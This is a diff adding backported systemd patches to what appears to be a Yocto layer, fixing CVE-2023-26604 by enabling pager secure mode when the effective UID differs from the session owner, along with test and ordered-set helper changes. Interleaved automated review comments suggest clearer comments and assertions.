++ r = getenv_bool("SYSTEMD_LESSSECURE");
++ if (r == 0) { /* Remove env var if off */
++ if (unsetenv("LESSSECURE") < 0) {
++ log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++ } else {
++ /* Set env var otherwise */
++ if (r < 0)
++ log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++
++ if (setenv("LESSSECURE", "1", 1) < 0) {
++ log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++ }
++
+ if (pager_args) {
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
new file mode 100644
index 0000000000..95da7cfad6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
@@ -0,0 +1,264 @@
+From 1b5b507cd2d1d7a2b053151abb548475ad9c5c3b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Mon, 12 Oct 2020 18:57:32 +0200
+Subject: [PATCH] test-login: always test sd_pid_get_owner_uid(), modernize
+
+A long time some function only worked when in a session, and the test
+didn't execute them when sd_pid_get_session() failed. Let's always call
+them to increase coverage.
+
+While at it, let's test for ==0 not >=0 where we don't expect the function
+to return anything except 0 or error.
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/1b5b507cd2d1d7a2b053151abb548475ad9c5c3b.patch]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/libsystemd/sd-login/test-login.c | 131 ++++++++++++++-------------
+ 1 file changed, 70 insertions(+), 61 deletions(-)
+
+diff --git a/src/libsystemd/sd-login/test-login.c b/src/libsystemd/sd-login/test-login.c
+index c0c77e04714b..0494fc77ba18 100644
+--- a/src/libsystemd/sd-login/test-login.c
++++ b/src/libsystemd/sd-login/test-login.c
+@@ -5,21 +5,22 @@
+ #include "sd-login.h"
+
+ #include "alloc-util.h"
++#include "errno-list.h"
+ #include "fd-util.h"
+ #include "format-util.h"
+ #include "log.h"
+ #include "string-util.h"
+ #include "strv.h"
+ #include "time-util.h"
+-#include "util.h"
++#include "user-util.h"
+
+ static char* format_uids(char **buf, uid_t* uids, int count) {
+- int pos = 0, k, inc;
++ int pos = 0, inc;
+ size_t size = (DECIMAL_STR_MAX(uid_t) + 1) * count + 1;
+
+ assert_se(*buf = malloc(size));
+
+- for (k = 0; k < count; k++) {
++ for (int k = 0; k < count; k++) {
+ sprintf(*buf + pos, "%s"UID_FMT"%n", k > 0 ? " " : "", uids[k], &inc);
+ pos += inc;
+ }
+@@ -30,6 +31,10 @@ static char* format_uids(char **buf, uid_t* uids, int count) {
+ return *buf;
+ }
+
++static const char *e(int r) {
++ return r == 0 ? "OK" : errno_to_name(r);
++}
++
+ static void test_login(void) {
+ _cleanup_close_pair_ int pair[2] = { -1, -1 };
+ _cleanup_free_ char *pp = NULL, *qq = NULL,
+@@ -39,65 +44,71 @@ static void test_login(void) {
+ *seat = NULL, *session = NULL,
+ *unit = NULL, *user_unit = NULL, *slice = NULL;
+ int r;
+- uid_t u, u2;
+- char *t, **seats, **sessions;
++ uid_t u, u2 = UID_INVALID;
++ char *t, **seats = NULL, **sessions = NULL;
+
+ r = sd_pid_get_unit(0, &unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_unit(0, …) → \"%s\"", strna(unit));
++ log_info("sd_pid_get_unit(0, …) → %s / \"%s\"", e(r), strnull(unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_user_unit(0, &user_unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_user_unit(0, …) → \"%s\"", strna(user_unit));
++ log_info("sd_pid_get_user_unit(0, …) → %s / \"%s\"", e(r), strnull(user_unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_slice(0, &slice);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_slice(0, …) → \"%s\"", strna(slice));
++ log_info("sd_pid_get_slice(0, …) → %s / \"%s\"", e(r), strnull(slice));
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ r = sd_pid_get_owner_uid(0, &u2);
++ log_info("sd_pid_get_owner_uid(0, …) → %s / "UID_FMT, e(r), u2);
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_session(0, &session);
+- if (r < 0) {
+- log_warning_errno(r, "sd_pid_get_session(0, …): %m");
+- if (r == -ENODATA)
+- log_info("Seems we are not running in a session, skipping some tests.");
+- } else {
+- log_info("sd_pid_get_session(0, …) → \"%s\"", session);
+-
+- assert_se(sd_pid_get_owner_uid(0, &u2) == 0);
+- log_info("sd_pid_get_owner_uid(0, …) → "UID_FMT, u2);
+-
+- assert_se(sd_pid_get_cgroup(0, &cgroup) == 0);
+- log_info("sd_pid_get_cgroup(0, …) → \"%s\"", cgroup);
+-
+- r = sd_uid_get_display(u2, &display_session);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_uid_get_display("UID_FMT", …) → \"%s\"",
+- u2, strnull(display_session));
+-
+- assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
+- sd_peer_get_session(pair[0], &pp);
+- sd_peer_get_session(pair[1], &qq);
+- assert_se(streq_ptr(pp, qq));
+-
+- r = sd_uid_get_sessions(u2, false, &sessions);
++ log_info("sd_pid_get_session(0, …) → %s / \"%s\"", e(r), strnull(session));
++
++ r = sd_pid_get_cgroup(0, &cgroup);
++ log_info("sd_pid_get_cgroup(0, …) → %s / \"%s\"", e(r), strnull(cgroup));
++ assert_se(r == 0);
++
++ r = sd_uid_get_display(u2, &display_session);
++ log_info("sd_uid_get_display("UID_FMT", …) → %s / \"%s\"", u2, e(r), strnull(display_session));
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
++ sd_peer_get_session(pair[0], &pp);
++ sd_peer_get_session(pair[1], &qq);
++ assert_se(streq_ptr(pp, qq));
++
++ r = sd_uid_get_sessions(u2, false, &sessions);
++ assert_se(t = strv_join(sessions, " "));
++ log_info("sd_uid_get_sessions("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(sessions));
+- assert_se(t = strv_join(sessions, " "));
+- strv_free(sessions);
+- log_info("sd_uid_get_sessions("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
++ }
++ sessions = strv_free(sessions);
++ free(t);
+
+- assert_se(r == sd_uid_get_sessions(u2, false, NULL));
++ assert_se(r == sd_uid_get_sessions(u2, false, NULL));
+
+- r = sd_uid_get_seats(u2, false, &seats);
++ r = sd_uid_get_seats(u2, false, &seats);
++ assert_se(t = strv_join(seats, " "));
++ log_info("sd_uid_get_seats("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(seats));
+- assert_se(t = strv_join(seats, " "));
+- strv_free(seats);
+- log_info("sd_uid_get_seats("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
+-
+- assert_se(r == sd_uid_get_seats(u2, false, NULL));
+ }
++ seats = strv_free(seats);
++ free(t);
++
++ assert_se(r == sd_uid_get_seats(u2, false, NULL));
+
+ if (session) {
+ r = sd_session_is_active(session);
+@@ -109,7 +120,7 @@ static void test_login(void) {
+ log_info("sd_session_is_remote(\"%s\") → %s", session, yes_no(r));
+
+ r = sd_session_get_state(session, &state);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_session_get_state(\"%s\") → \"%s\"", session, state);
+
+ assert_se(sd_session_get_uid(session, &u) >= 0);
+@@ -123,16 +134,16 @@ static void test_login(void) {
+ log_info("sd_session_get_class(\"%s\") → \"%s\"", session, class);
+
+ r = sd_session_get_display(session, &display);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_display(\"%s\") → \"%s\"", session, strna(display));
+
+ r = sd_session_get_remote_user(session, &remote_user);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_user(\"%s\") → \"%s\"",
+ session, strna(remote_user));
+
+ r = sd_session_get_remote_host(session, &remote_host);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_host(\"%s\") → \"%s\"",
+ session, strna(remote_host));
+
+@@ -161,7 +172,7 @@ static void test_login(void) {
+ assert_se(r == -ENODATA);
+ }
+
+- assert_se(sd_uid_get_state(u, &state2) >= 0);
++ assert_se(sd_uid_get_state(u, &state2) == 0);
+ log_info("sd_uid_get_state("UID_FMT", …) → %s", u, state2);
+ }
+
+@@ -173,11 +184,11 @@ static void test_login(void) {
+ assert_se(sd_uid_is_on_seat(u, 0, seat) > 0);
+
+ r = sd_seat_get_active(seat, &session2, &u2);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_seat_get_active(\"%s\", …) → \"%s\", "UID_FMT, seat, session2, u2);
+
+ r = sd_uid_is_on_seat(u, 1, seat);
+- assert_se(r >= 0);
++ assert_se(IN_SET(r, 0, 1));
+ assert_se(!!r == streq(session, session2));
+
+ r = sd_seat_get_sessions(seat, &sessions, &uids, &n);
+@@ -185,8 +196,8 @@ static void test_login(void) {
+ assert_se(r == (int) strv_length(sessions));
+ assert_se(t = strv_join(sessions, " "));
+ strv_free(sessions);
+- log_info("sd_seat_get_sessions(\"%s\", …) → %i, \"%s\", [%i] {%s}",
+- seat, r, t, n, format_uids(&buf, uids, n));
++ log_info("sd_seat_get_sessions(\"%s\", …) → %s, \"%s\", [%u] {%s}",
++ seat, e(r), t, n, format_uids(&buf, uids, n));
+ free(t);
+
+ assert_se(sd_seat_get_sessions(seat, NULL, NULL, NULL) == r);
+@@ -204,7 +215,7 @@ static void test_login(void) {
+
+ r = sd_seat_get_active(NULL, &t, NULL);
+ assert_se(IN_SET(r, 0, -ENODATA));
+- log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s", strnull(t));
++ log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s / \"%s\"", e(r), strnull(t));
+ free(t);
+
+ r = sd_get_sessions(&sessions);
+@@ -244,13 +255,11 @@ static void test_login(void) {
+
+ static void test_monitor(void) {
+ sd_login_monitor *m = NULL;
+- unsigned n;
+ int r;
+
+- r = sd_login_monitor_new("session", &m);
+- assert_se(r >= 0);
++ assert_se(sd_login_monitor_new("session", &m) == 0);
+
+- for (n = 0; n < 5; n++) {
++ for (unsigned n = 0; n < 5; n++) {
+ struct pollfd pollfd = {};
+ usec_t timeout, nw;
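Review bot: The new `e()` helper in test-login.c passes every non-zero `r` to errno_to_name(), but three of the new log lines give it a return value that is a count on success. These are the lines for sd_uid_get_sessions(), sd_uid_get_seats() and sd_seat_get_sessions(); the same hunk asserts `r == (int) strv_length(sessions)`. A positive count would then be logged as an errno name, or passed to `%s` as whatever errno_to_name() returns for an unknown value, which I have not checked here. That makes the test log misleading when diagnosing a failure. Treating only negative values as errors avoids it: `return r >= 0 ? "OK" : errno_to_name(r);`, keeping the `[%i]` count in those three messages. test_login() spans several hunks and continues outside them.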
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
new file mode 100644
index 0000000000..f02f62b772
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
@@ -0,0 +1,182 @@
+From 0a42426d797406b4b01a0d9c13bb759c2629d108 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 7 Oct 2020 11:15:05 +0200
+Subject: [PATCH] pager: make pager secure when under euid is changed or
+ explicitly requested
+
+The variable is renamed to SYSTEMD_PAGERSECURE (because it's not just about
+less now), and we automatically enable secure mode in certain cases, but not
+otherwise.
+
+This approach is more nuanced, but should provide a better experience for
+users:
+
+- Previusly we would set LESSSECURE=1 and trust the pager to make use of
+ it. But this has an effect only on less. We need to not start pagers which
+ are insecure when in secure mode. In particular more is like that and is a
+ very popular pager.
+
+- We don't enable secure mode always, which means that those other pagers can
+ reasonably used.
+
+- We do the right thing by default, but the user has ultimate control by
+ setting SYSTEMD_PAGERSECURE.
+
+Fixes #5666.
+
+v2:
+- also check $PKEXEC_UID
+
+v3:
+- use 'sd_pid_get_owner_uid() != geteuid()' as the condition
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/0a42426d797406b4b01a0d9c13bb759c2629d108]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 30 +++++++++++++++----
+ src/shared/pager.c | 63 ++++++++++++++++++++++++++-------------
+ 2 files changed, 66 insertions(+), 27 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index c52511c..049e9f7 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -65,12 +65,30 @@
+ </varlistentry>
+
+ <varlistentry id='lesssecure'>
+- <term><varname>$SYSTEMD_LESSSECURE</varname></term>
+-
+- <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
+- variable when invoking the pager, which controls the "secure" mode of less (which disables commands
+- such as <literal>|</literal> which allow to easily shell out to external command lines). By default
+- less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ <term><varname>$SYSTEMD_PAGERSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. When true, the "secure" mode of the pager is enabled; if
++ false, disabled. If <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, secure mode is enabled
++ if the effective UID is not the same as the owner of the login session, see <citerefentry
++ project='man-pages'><refentrytitle>geteuid</refentrytitle><manvolnum>2</manvolnum></citerefentry> and
++ <citerefentry><refentrytitle>sd_pid_get_owner_uid</refentrytitle><manvolnum>3</manvolnum></citerefentry>.
++ In secure mode, <option>LESSSECURE=1</option> will be set when invoking the pager, and the pager shall
++ disable commands that open or create new files or start new subprocesses. When
++ <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, pagers which are not known to implement
++ secure mode will not be used. (Currently only
++ <citerefentry><refentrytitle>less</refentrytitle><manvolnum>1</manvolnum></citerefentry> implements
++ secure mode.)</para>
++
++ <para>Note: when commands are invoked with elevated privileges, for example under <citerefentry
++ project='man-pages'><refentrytitle>sudo</refentrytitle><manvolnum>8</manvolnum></citerefentry> or
++ <citerefentry
++ project='die-net'><refentrytitle>pkexec</refentrytitle><manvolnum>1</manvolnum></citerefentry>, care
++ must be taken to ensure that unintended interactive features are not enabled. "Secure" mode for the
++ pager may be enabled automatically as describe above. Setting <varname>SYSTEMD_PAGERSECURE=0</varname>
++ or not removing it from the inherited environment allows the user to invoke arbitrary commands. Note
++ that if the <varname>$SYSTEMD_PAGER</varname> or <varname>$PAGER</varname> variables are to be
++ honoured, <varname>$SYSTEMD_PAGERSECURE</varname> must be set too. It might be reasonable to completly
++ disable the pager using <option>--no-pager</option> instead.</para></listitem>
+ </varlistentry>
+
+ <varlistentry id='colors'>
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a3b6576..a72d9ea 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -8,6 +8,8 @@
+ #include <sys/prctl.h>
+ #include <unistd.h>
+
++#include "sd-login.h"
++
+ #include "copy.h"
+ #include "env-util.h"
+ #include "fd-util.h"
+@@ -164,25 +166,42 @@ int pager_open(PagerFlags flags) {
+ }
+
+ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
+- * privileged stuff. */
+- r = getenv_bool("SYSTEMD_LESSSECURE");
+- if (r == 0) { /* Remove env var if off */
+- if (unsetenv("LESSSECURE") < 0) {
+- log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
+- } else {
+- /* Set env var otherwise */
++ * privileged stuff. If the user set $SYSTEMD_PAGERSECURE, trust their configuration of the
++ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
++ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
++ * know to be good. */
++ int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ bool trust_pager = use_secure_mode >= 0;
++ if (use_secure_mode == -ENXIO) {
++ uid_t uid;
++
++ r = sd_pid_get_owner_uid(0, &uid);
+ if (r < 0)
+- log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++ log_debug_errno(r, "sd_pid_get_owner_uid() failed, enabling pager secure mode: %m");
+
+- if (setenv("LESSSECURE", "1", 1) < 0) {
+- log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
++ use_secure_mode = r < 0 || uid != geteuid();
++
++ } else if (use_secure_mode < 0) {
++ log_warning_errno(use_secure_mode, "Unable to parse $SYSTEMD_PAGERSECURE, assuming true: %m");
++ use_secure_mode = true;
+ }
+
+- if (pager_args) {
++ /* We generally always set variables used by less, even if we end up using a different pager.
++ * They shouldn't hurt in any case, and ideally other pagers would look at them too. */
++ if (use_secure_mode)
++ r = setenv("LESSSECURE", "1", 1);
++ else
++ r = unsetenv("LESSSECURE");
++ if (r < 0) {
++ log_error_errno(errno, "Failed to adjust environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++
++ if (trust_pager && pager_args) { /* The pager config might be set globally, and we cannot
++ * know if the user adjusted it to be appropriate for the
++ * secure mode. Thus, start the pager specified through
++ * envvars only when $SYSTEMD_PAGERSECURE was explicitly set
++ * as well. */
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -194,13 +213,14 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using fallback pagers: %m", pager_args[0]);
+ }
+
+- /* Debian's alternatives command for pagers is
+- * called 'pager'. Note that we do not call
+- * sensible-pagers here, since that is just a
+- * shell script that implements a logic that
+- * is similar to this one anyway, but is
+- * Debian-specific. */
++ /* Debian's alternatives command for pagers is called 'pager'. Note that we do not call
++ * sensible-pagers here, since that is just a shell script that implements a logic that is
++ * similar to this one anyway, but is Debian-specific. */
+ FOREACH_STRING(exe, "pager", "less", "more") {
++ /* Only less implements secure mode right now. */
++ if (use_secure_mode && !streq(exe, "less"))
++ continue;
++
+ r = loop_write(exe_name_pipe[1], exe, strlen(exe) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -211,6 +231,7 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using next fallback pager: %m", exe);
+ }
+
++ /* Our builtin is also very secure. */
+ r = loop_write(exe_name_pipe[1], "(built-in)", strlen("(built-in)") + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
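Review bot: In pager_open(), the secure-mode fallback loop accepts any executable named `less` found on the search path, and the new comment `/* Only less implements secure mode right now. */` does not say which implementation that assumes. Secure mode only helps if that binary actually honours `LESSSECURE=1`. On images built from this layer `less` may not be the reference implementation (a busybox applet, for instance), and I cannot tell from this hunk whether such a variant honours it. I would extend the comment to state the assumption, e.g. `/* Only less implements secure mode right now; this assumes the 'less' we find honours LESSSECURE. */`, and add a note to the recipe or release notes telling integrators to verify this for their image. pager_open() starts and ends outside these hunks, so how the chosen name is finally executed is not visible here.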
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
new file mode 100644
index 0000000000..bc6b0a91c2
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
@@ -0,0 +1,32 @@
+From b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Thu, 15 Oct 2020 10:54:48 +0200
+Subject: [PATCH] pager: lets check SYSTEMD_PAGERSECURE with secure_getenv()
+
+I can't think of any real vulnerability about this, but it still feels
+better to check a variable with "secure" in its name with
+secure_getenv() rather than plain getenv().
+
+Paranoia FTW!
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17359/commits/b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/shared/pager.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a72d9ea..250519c 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -170,7 +170,7 @@ int pager_open(PagerFlags flags) {
+ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
+ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
+ * know to be good. */
+- int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ int use_secure_mode = getenv_bool_secure("SYSTEMD_PAGERSECURE");
+ bool trust_pager = use_secure_mode >= 0;
+ if (use_secure_mode == -ENXIO) {
+ uid_t uid;
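Review bot: The switch to `getenv_bool_secure()` at the `use_secure_mode` declaration changes behaviour only for processes in secure-execution mode, and the comment above it does not say so. In that mode `secure_getenv()` returns NULL, so the variable reads as unset; the call then presumably yields -ENXIO, `trust_pager` stays false and the autodetection branch that follows decides. I would extend the comment with `/* Read via secure_getenv(): ignored in secure-execution (AT_SECURE) processes, which fall through to the autodetection below. */`. The commit message says no concrete vulnerability is known for this line, so for CVE tracking the `CVE:` tag is best read as covering the patch series as a whole. pager_open() starts and ends outside the hunk.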
diff --git a/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
new file mode 100644
index 0000000000..86d9b0499a
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
@@ -0,0 +1,78 @@
+From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 1 Sep 2020 12:42:35 +0200
+Subject: [PATCH] basic: pass allocation info for ordered_set_new() and
+ introduce ordered_set_ensure_put()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.c | 21 +++++++++++++++++++++
+ src/basic/ordered-set.h | 18 +++++++-----------
+ 2 files changed, 28 insertions(+), 11 deletions(-)
+
+diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c
+index 7fdb47e064..fb82c17b5a 100644
+--- a/src/basic/ordered-set.c
++++ b/src/basic/ordered-set.c
+@@ -4,6 +4,27 @@
+ #include "ordered-set.h"
+ #include "strv.h"
+
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ if (*s)
++ return 0;
++
++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS);
++ if (!*s)
++ return -ENOMEM;
++
++ return 0;
++}
++
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) {
++ int r;
++
++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS);
++ if (r < 0)
++ return r;
++
++ return ordered_set_put(*s, p);
++}
++
+ int ordered_set_consume(OrderedSet *s, void *p) {
+ int r;
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a42a57eb49..2c241a808b 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -7,20 +7,16 @@
+
+ typedef struct OrderedSet OrderedSet;
+
+-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) {
+- return (OrderedSet*) ordered_hashmap_new(ops);
++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS);
+ }
++#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS)
+
+-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) {
+- if (*s)
+- return 0;
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS)
+
+- *s = ordered_set_new(ops);
+- if (!*s)
+- return -ENOMEM;
+-
+- return 0;
+-}
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS)
+
+ static inline OrderedSet* ordered_set_free(OrderedSet *s) {
+ return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s);
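Review bot: `_ordered_set_ensure_put()` in ordered-set.c has no comment on what it leaves behind when it fails. When `*s` was NULL it first allocates the set and then returns the result of `ordered_set_put()` unchanged, so after a failed put the caller holds a newly allocated, empty set in `*s` and still owns it. Both new functions also dereference `s` without checking it. I would add `assert(s);` as the first statement of `_ordered_set_ensure_allocated()` and a comment above `_ordered_set_ensure_put()` such as `/* On failure *s may already have been allocated and is left for the caller to free. */`.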
diff --git a/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
new file mode 100644
index 0000000000..42b6e05b55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
@@ -0,0 +1,35 @@
+From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 26 Apr 2021 23:52:40 +0900
+Subject: [PATCH] ordered-set: introduce
+ ordered_set_clear/free_with_destructor()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.h | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a377f20b1f..64df41766f 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s);
+ #define ORDERED_SET_FOREACH(e, s, i) \
+ for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); )
+
++#define ordered_set_clear_with_destructor(s, f) \
++ ({ \
++ OrderedSet *_s = (s); \
++ void *_item; \
++ while ((_item = ordered_set_steal_first(_s))) \
++ f(_item); \
++ _s; \
++ })
++#define ordered_set_free_with_destructor(s, f) \
++ ordered_set_free(ordered_set_clear_with_destructor(s, f))
++
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free);
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free);
+
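Review bot: `ordered_set_clear_with_destructor()` and `ordered_set_free_with_destructor()` are added without a comment on ownership. The first calls `f` on every item taken out with `ordered_set_steal_first()` and evaluates to the emptied set, which stays allocated; the second hands that set to `ordered_set_free()`. I would put `/* Calls f() on each item; the set itself stays allocated and is the value of the expression. */` above the first macro so callers know which of the two releases the container.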
diff --git a/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
new file mode 100644
index 0000000000..06c523834d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
@@ -0,0 +1,285 @@
+From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 7 May 2021 15:39:16 +0900
+Subject: [PATCH] network: add skeleton of request queue
+
+This will be used in later commits.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/meson.build | 2 +
+ src/network/networkd-link.c | 20 +++++-
